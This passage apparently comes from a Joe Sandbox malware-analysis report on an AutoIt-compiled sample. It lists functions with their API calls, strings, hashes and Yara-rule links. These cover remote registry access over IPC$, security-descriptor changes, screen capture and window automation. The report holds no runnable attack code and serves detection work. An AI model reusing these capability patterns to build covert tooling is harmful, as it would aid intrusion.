                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 2698844021-4113822522
                                        • Opcode ID: eb24833d99f71f342c692521575ba0edd153f836044d27e6d1b41d0fdca2caea
                                        • Instruction ID: ee9b0e02afdfecba6c35d23c7539667b0924da1687cb62e26db14db98ea6babe
                                        • Opcode Fuzzy Hash: eb24833d99f71f342c692521575ba0edd153f836044d27e6d1b41d0fdca2caea
                                        • Instruction Fuzzy Hash: 67516C726047159FC706EF10D89196AB7E8FF88758F00886DF8969B261DB31EE05CB92
                                        Function 00363110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00394085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00363145
                                        • LoadStringW.USER32(00000000,?,00394085,00000016), ref: 0036314E
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00394085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00363170
                                        • LoadStringW.USER32(00000000,?,00394085,00000016), ref: 00363173
                                        • __swprintf.LIBCMT ref: 003631B3
                                        • __swprintf.LIBCMT ref: 003631C5
                                        • _wprintf.LIBCMT ref: 0036326C
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00363283
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 984253442-2268648507
                                        • Opcode ID: bf698b46f921a24cc527e1b3716455a5f714fbf68d0e4717dc54f9f0aa245253
                                        • Instruction ID: 3d481f5dd47f9dd6f43bd97ea9c829feaaa75c0469151b55dec3a16f24cf562f
                                        • Opcode Fuzzy Hash: bf698b46f921a24cc527e1b3716455a5f714fbf68d0e4717dc54f9f0aa245253
                                        • Instruction Fuzzy Hash: C2414472900219A6CB16FB90ED97EEFB77CAF15700F504465F201B60A2EE756F44CAA1
                                        Function 0036D950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0036D96C
                                        • __swprintf.LIBCMT ref: 0036D98E
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0036D9CB
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0036D9F0
                                        • _memset.LIBCMT ref: 0036DA0F
                                        • _wcsncpy.LIBCMT ref: 0036DA4B
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0036DA80
                                        • CloseHandle.KERNEL32(00000000), ref: 0036DA8B
                                        • RemoveDirectoryW.KERNEL32(?), ref: 0036DA94
                                        • CloseHandle.KERNEL32(00000000), ref: 0036DA9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                        • String ID: :$\$\??\%s
                                        • API String ID: 2733774712-3457252023
                                        • Opcode ID: 59721acbd202b839125acd0be71875af27bd758702c6484e141a2539de15f2b6
                                        • Instruction ID: cec7dfcb180bdfd35baab96f2fcb2f09edef82a6aae818b6dce801460eeda8a8
                                        • Opcode Fuzzy Hash: 59721acbd202b839125acd0be71875af27bd758702c6484e141a2539de15f2b6
                                        • Instruction Fuzzy Hash: 2231A676A00208AADB22DFA4DC49FDA77FDBF89700F1481A5F519D6061E770DA81CBA1
                                        Function 00370B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                        Download Yara Rule
                                        APIs
                                        • __wsplitpath.LIBCMT ref: 00370C93
                                        • _wcscat.LIBCMT ref: 00370CAB
                                        • _wcscat.LIBCMT ref: 00370CBD
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00370CD2
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00370CE6
                                        • GetFileAttributesW.KERNEL32(?), ref: 00370CFE
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00370D18
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00370D2A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                        • String ID: *.*
                                        • API String ID: 34673085-438819550
                                        • Opcode ID: 1a2d4fb65938ab5a4fd3414b85d1fcf8ab8e6d0b1066c07eaeedfc42206c94d9
                                        • Instruction ID: a980f3d16e58a08a4602b1e92e177f947ae546ffc39d2f1dc89aec9571c3e4f4
                                        • Opcode Fuzzy Hash: 1a2d4fb65938ab5a4fd3414b85d1fcf8ab8e6d0b1066c07eaeedfc42206c94d9
                                        • Instruction Fuzzy Hash: BB81A8B1504305DFC77ADF64C8449AAB7E8AB89314F15C91EF489CB251E738ED84CB52
                                        Function 0035B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0035B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0035B903
                                          • Part of subcall function 0035B8E7: GetLastError.KERNEL32(?,0035B3CB,?,?,?), ref: 0035B90D
                                          • Part of subcall function 0035B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0035B3CB,?,?,?), ref: 0035B91C
                                          • Part of subcall function 0035B8E7: RtlAllocateHeap.NTDLL(00000000,?,0035B3CB), ref: 0035B923
                                          • Part of subcall function 0035B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0035B93A
                                          • Part of subcall function 0035B982: GetProcessHeap.KERNEL32(00000008,0035B3E1,00000000,00000000,?,0035B3E1,?), ref: 0035B98E
                                          • Part of subcall function 0035B982: RtlAllocateHeap.NTDLL(00000000,?,0035B3E1), ref: 0035B995
                                          • Part of subcall function 0035B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0035B3E1,?), ref: 0035B9A6
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0035B5F7
                                        • _memset.LIBCMT ref: 0035B60C
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0035B62B
                                        • GetLengthSid.ADVAPI32(?), ref: 0035B63C
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0035B679
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0035B695
                                        • GetLengthSid.ADVAPI32(?), ref: 0035B6B2
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0035B6C1
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0035B6C8
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0035B6E9
                                        • CopySid.ADVAPI32(00000000), ref: 0035B6F0
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0035B721
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0035B747
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0035B75B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: a9a86fc3334d483713cea051804b8653778ff2ddd9be28343abe206f2ab400a3
                                        • Instruction ID: 27d96ea11a065a756acab243cb6268e08fbd62c7ce0b7f768a47c53c02353009
                                        • Opcode Fuzzy Hash: a9a86fc3334d483713cea051804b8653778ff2ddd9be28343abe206f2ab400a3
                                        • Instruction Fuzzy Hash: 85514C75900209ABDF02DFA4DC45EEEBB79FF49305F048159FD16AB2A0DB309A09CB60
                                        Function 0037A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0037A2DD
                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0037A2E9
                                        • CreateCompatibleDC.GDI32(?), ref: 0037A2F5
                                        • SelectObject.GDI32(00000000,?), ref: 0037A302
                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0037A356
                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0037A392
                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0037A3B6
                                        • SelectObject.GDI32(00000006,?), ref: 0037A3BE
                                        • DeleteObject.GDI32(?), ref: 0037A3C7
                                        • DeleteDC.GDI32(00000006), ref: 0037A3CE
                                        • ReleaseDC.USER32(00000000,?), ref: 0037A3D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: d6da3327b16b4921897a94111de8572cd9214fe5df30eff3e3ebd54d61c34f97
                                        • Instruction ID: c642d16d542505ffa5a9777eb0001aad4ef1a59a703ca2d0de37ce0d1e4b4a64
                                        • Opcode Fuzzy Hash: d6da3327b16b4921897a94111de8572cd9214fe5df30eff3e3ebd54d61c34f97
                                        • Instruction Fuzzy Hash: EC516B75A00709EFDB26CFA8DC84EAEBBB9EF49310F14841DF95AA7650C735A841CB50
                                        Function 00383AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E=
                                        • API String ID: 3964851224-2382786368
                                        • Opcode ID: 96417d1bb644b943008c1319fdaec44b029f3404eef4f84f18fa086d1a2f907b
                                        • Instruction ID: 666f6237ddbb54a795df2984be52fb93cda7b1eab8d6e719b07b06b7e831471b
                                        • Opcode Fuzzy Hash: 96417d1bb644b943008c1319fdaec44b029f3404eef4f84f18fa086d1a2f907b
                                        • Instruction Fuzzy Hash: 0E416B3910034A8FCF0BFF14E881AEA3365BF56750F5508A5ECA26F395DB709A0ACB51
                                        Function 00368097 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • timeGetTime.WINMM ref: 0036809C
                                          • Part of subcall function 0033E3A5: timeGetTime.WINMM(?,753DB400,00396163), ref: 0033E3A9
                                        • Sleep.KERNEL32(0000000A), ref: 003680C8
                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 003680EC
                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0036810E
                                        • SetActiveWindow.USER32 ref: 0036812D
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0036813B
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0036815A
                                        • Sleep.KERNEL32(000000FA), ref: 00368165
                                        • IsWindow.USER32 ref: 00368171
                                        • EndDialog.USER32(00000000), ref: 00368182
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: @U=u$BUTTON
                                        • API String ID: 1194449130-2582809321
                                        • Opcode ID: 708cd1d01b03af826173d41b6737a2058f482ecbc2597096ca86b11e10ac63eb
                                        • Instruction ID: 4f80f3ef1e3594da59aaeb5aa890c00436c203724562f4e1dac9450927983bf7
                                        • Opcode Fuzzy Hash: 708cd1d01b03af826173d41b6737a2058f482ecbc2597096ca86b11e10ac63eb
                                        • Instruction Fuzzy Hash: 2D215EB0240244BFE7235B22ECCDA263B6EE71B388F458714F5128B6E5CB764D059A11
                                        Function 003632B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00393C64,00000010,00000000,Bad directive syntax error,003BDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 003632D1
                                        • LoadStringW.USER32(00000000,?,00393C64,00000010), ref: 003632D8
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • _wprintf.LIBCMT ref: 00363309
                                        • __swprintf.LIBCMT ref: 0036332B
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00363395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$">
                                        • API String ID: 1506413516-1380894278
                                        • Opcode ID: 0aab2af6e7796e2e5ebfc7936b8f6aa91fb77505469f8f53329c53cba5b21c13
                                        • Instruction ID: ceafd0f249fa2b18e45a6e0b90161cb89326e21ee714eb261a8c48267408a307
                                        • Opcode Fuzzy Hash: 0aab2af6e7796e2e5ebfc7936b8f6aa91fb77505469f8f53329c53cba5b21c13
                                        • Instruction Fuzzy Hash: 0D217F36850229BBCF03EF90DC06EEE7779BF14700F004456F505A90A1EB75AB58DB91
                                        Function 0036D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 0036D567
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 0036D589
                                        • __swprintf.LIBCMT ref: 0036D5DC
                                        • _wprintf.LIBCMT ref: 0036D68D
                                        • _wprintf.LIBCMT ref: 0036D6AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2116804098-2391861430
                                        • Opcode ID: 06011a402377065be492af0190428ed8ccbe2972edf4525fa8cd2ef6bcdeab46
                                        • Instruction ID: eb3f84eea646ec06fd157b1384b467fe885142909dd7421f4bc23c46dde67df1
                                        • Opcode Fuzzy Hash: 06011a402377065be492af0190428ed8ccbe2972edf4525fa8cd2ef6bcdeab46
                                        • Instruction Fuzzy Hash: 0651A871D00119BBCB17EB90DD82EEEB779AF04300F508166F105B61A5EB715F54CBA1
                                        Function 0036D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0036D37F
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0036D3A0
                                        • __swprintf.LIBCMT ref: 0036D3F3
                                        • _wprintf.LIBCMT ref: 0036D499
                                        • _wprintf.LIBCMT ref: 0036D4B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2116804098-3420473620
                                        • Opcode ID: 3254595b47266ec82442c202077158c701bc1655cf1c527bc0a371a785d39ecf
                                        • Instruction ID: dd776a9c55988e7d9d7285474c0543d90c6cbd6f89e51202a88c0f2563173703
                                        • Opcode Fuzzy Hash: 3254595b47266ec82442c202077158c701bc1655cf1c527bc0a371a785d39ecf
                                        • Instruction Fuzzy Hash: D8519472D00119AACB17EBA0DD82EEEB779AF14700F108166F105B61A1EF756F58CBA1
                                        Function 0035AEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • _memset.LIBCMT ref: 0035AF74
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0035AFA9
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0035AFC5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0035AFE1
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0035B00B
                                        • CLSIDFromString.COMBASE(?,?), ref: 0035B033
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0035B03E
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0035B043
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 1411258926-22481851
                                        • Opcode ID: 75efc16e32328dd1579207585dbd6757def98c1f1dfc99e0b4a6593b3f5b2ba6
                                        • Instruction ID: 080db67d1f8bf5193c1009b97c1a8c724de2df525199f23533a54badd9f3d8d3
                                        • Opcode Fuzzy Hash: 75efc16e32328dd1579207585dbd6757def98c1f1dfc99e0b4a6593b3f5b2ba6
                                        • Instruction Fuzzy Hash: 40411B76C1162DABCF12EBA4EC95DEEB778BF14700F01416AE901A71A0EB749E04CB90
                                        Function 00367212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __swprintf.LIBCMT ref: 00367226
                                        • __swprintf.LIBCMT ref: 00367233
